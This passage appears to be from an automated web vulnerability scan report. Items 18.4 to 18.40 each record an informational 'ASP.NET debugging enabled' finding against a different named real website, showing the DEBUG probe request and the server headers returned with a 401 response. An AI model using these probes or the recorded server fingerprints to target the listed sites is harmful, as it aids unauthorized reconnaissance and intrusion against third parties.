Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.4. http://www.alzheimersrxtreatment.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alzheimersrxtreatment.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.alzheimersrxtreatment.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 39
Content-Type: text/html; charset=utf-8
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 04 May 2011 01:36:15 GMT
Connection: close

Debug access denied to '/Default.aspx'.

18.5. http://www.applytracking.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.applytracking.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.applytracking.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:58:57 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.6. http://www.awsedr.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.awsedr.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.awsedr.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Content-Length: 39
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:09:58 GMT
Connection: close

Debug access denied to '/Default.aspx'.

18.7. http://www.bodybyvi.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bodybyvi.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.bodybyvi.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: SOLX
Date: Wed, 04 May 2011 00:47:03 GMT
Connection: close
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.8. http://www.booktv.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.booktv.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.booktv.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:11:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.9. http://www.breederscup.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.breederscup.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.breederscup.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Date: Wed, 04 May 2011 00:49:25 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Farm: 233
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Connection: close
Via: 1.1 AN-0016020121270012

Debug access denied to '/Default.aspx'.

18.10. http://www.bystolic.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bystolic.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.bystolic.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Wed, 04 May 2011 03:23:17 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: NSC_cztupmjd-wjq=8efb302d3660;path=/

Debug access denied to '/Default.aspx'.

18.11. http://www.cern.ch/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cern.ch
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.cern.ch
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:16:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.12. http://www.childrens.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.childrens.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.childrens.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:29:19 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.childrens.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.13. http://www.consumerdemocracy.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.consumerdemocracy.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.consumerdemocracy.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:10:43 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM
WWW-Authenticate: Negotiate
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.14. http://www.cpllabs.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cpllabs.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.cpllabs.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 04:15:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.15. http://www.creditacceptance.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.creditacceptance.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.creditacceptance.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:27:22 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServerwwwCApool80=358900746.20480.0000; path=/

Debug access denied to '/Default.aspx'.

18.16. http://www.crimcheck.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.crimcheck.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.crimcheck.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:54:22 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.17. http://www.crohnsonline.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.crohnsonline.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.crohnsonline.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Set-Cookie:WT_INTOUCH=173.193.214.243-1430939408.30149127; expires=Mon, 02-May-2016 02:59:49 GMT; path=/
Connection: close
Date: Wed, 04 May 2011 02:59:49 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.18. http://www.cupchimerical.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cupchimerical.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.cupchimerical.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:17:48 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="IIS - hopwalrus.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.19. http://www.dutyfreeaffiliates.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dutyfreeaffiliates.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.dutyfreeaffiliates.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:37:33 GMT
Connection: close
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.20. http://www.dvdnow.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dvdnow.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.dvdnow.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
WWW-Authenticate: Basic realm="www.dvdnow.net"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:50 GMT
Connection: close
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.21. http://www.e-resume.us/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.e-resume.us
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.e-resume.us
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:30:16 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.22. http://www.ecndigitaledition.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ecndigitaledition.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ecndigitaledition.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:57:01 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.23. http://www.elpasoco.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.elpasoco.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.elpasoco.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:49:57 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.24. http://www.embark.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.embark.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.embark.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:31:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6315
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.25. http://www.endlessvacation.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.endlessvacation.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.endlessvacation.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:26:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.26. http://www.exite-listings.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.exite-listings.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.exite-listings.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:26:57 GMT
Server: Microsoft-IIS/6.0
WhoAmI: Hera
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.27. http://www.fiserv.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fiserv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.fiserv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:42:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.28. http://www.gottashopdeals.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gottashopdeals.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.gottashopdeals.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:26:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.29. http://www.hondapartshouse.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hondapartshouse.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.hondapartshouse.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 00:45:17 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.30. http://www.housefabric.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.housefabric.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.housefabric.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 39
Date: Wed, 04 May 2011 01:20:19 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET

Debug access denied to '/Default.aspx'.

18.31. http://www.icing.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.icing.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.icing.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:15:40 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: Coyote-2-d80f9cf5=d80f9ce5:0; path=/

Debug access denied to '/Default.aspx'.

18.32. http://www.ies-co.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ies-co.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ies-co.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:58:33 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.33. http://www.integrativelogic.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.integrativelogic.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.integrativelogic.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:36:46 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.34. http://www.kawasakipartshouse.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kawasakipartshouse.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.kawasakipartshouse.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 04:18:10 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.35. http://www.kleinisd.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kleinisd.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.kleinisd.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:07:41 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.36. http://www.lockridgehomes.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lockridgehomes.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.lockridgehomes.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:57:29 GMT
Server: Microsoft-IIS/6.0
Expires: -1
Pragma: no-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.37. http://www.lostmoneylocators.info/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lostmoneylocators.info
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.lostmoneylocators.info
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:34:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.38. http://www.michigan-energy.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan-energy.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.michigan-energy.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:02:58 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.michigan-energy.org"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.39. http://www.moreplatformbeds.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.moreplatformbeds.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.moreplatformbeds.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:10:28 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.40. http://www.motion-vr.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.motion-vr.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.motion-vr.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 04:12:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
